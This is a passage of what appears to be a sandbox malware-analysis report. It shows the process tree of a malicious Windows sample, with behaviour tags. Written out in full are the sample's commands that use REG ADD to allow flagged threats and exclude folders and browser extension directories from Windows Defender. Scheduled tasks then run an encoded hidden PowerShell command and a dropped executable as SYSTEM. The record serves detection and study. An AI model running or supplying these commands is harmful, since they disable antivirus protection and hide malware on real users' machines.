C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2364 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
- System Location Discovery: System Language Discovery
PID:1036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:3000
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1544 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3948
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2484
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4440
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKRdpmURQpaU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKRdpmURQpaU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZTBxIWbqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZTBxIWbqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aMBHFSbSyrUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\aMBHFSbSyrUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\smKXxMfqpieUC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\smKXxMfqpieUC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyxcWyOuWaibjkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyxcWyOuWaibjkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AkGJDxGRiCChDkCg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\AkGJDxGRiCChDkCg\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:323⤵PID:3536
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:804
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKRdpmURQpaU2" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:4232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZTBxIWbqU" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZTBxIWbqU" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aMBHFSbSyrUn" /t REG_DWORD /d 0 /reg:323⤵PID:4652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aMBHFSbSyrUn" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\smKXxMfqpieUC" /t REG_DWORD /d 0 /reg:323⤵PID:4276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\smKXxMfqpieUC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOBlloqpUQIzwZLwmJR" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyxcWyOuWaibjkVB /t REG_DWORD /d 0 /reg:323⤵PID:568
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyxcWyOuWaibjkVB /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PeYlPniMlKWeAvybP /t REG_DWORD /d 0 /reg:643⤵PID:3628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AkGJDxGRiCChDkCg /t REG_DWORD /d 0 /reg:323⤵PID:3156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\AkGJDxGRiCChDkCg /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:3552
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcayjiTvn" /SC once /ST 06:07:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcayjiTvn"2⤵PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcayjiTvn"2⤵PID:4664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "voUEtHYOOZwJsxqeG" /SC once /ST 05:13:07 /RU "SYSTEM" /TR "\"C:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\fKyKrYk.exe\" 9m /tpRYdidkU 385104 /S" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "voUEtHYOOZwJsxqeG"2⤵
- System Location Discovery: System Language Discovery
PID:3316
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 6802⤵
- Program crash
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3196
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2424
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4852
-
C:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\fKyKrYk.exeC:\Windows\Temp\AkGJDxGRiCChDkCg\scsXxWhnCmegqEO\fKyKrYk.exe 9m /tpRYdidkU 385104 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3576 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4424
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:4800 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2728
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:3832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
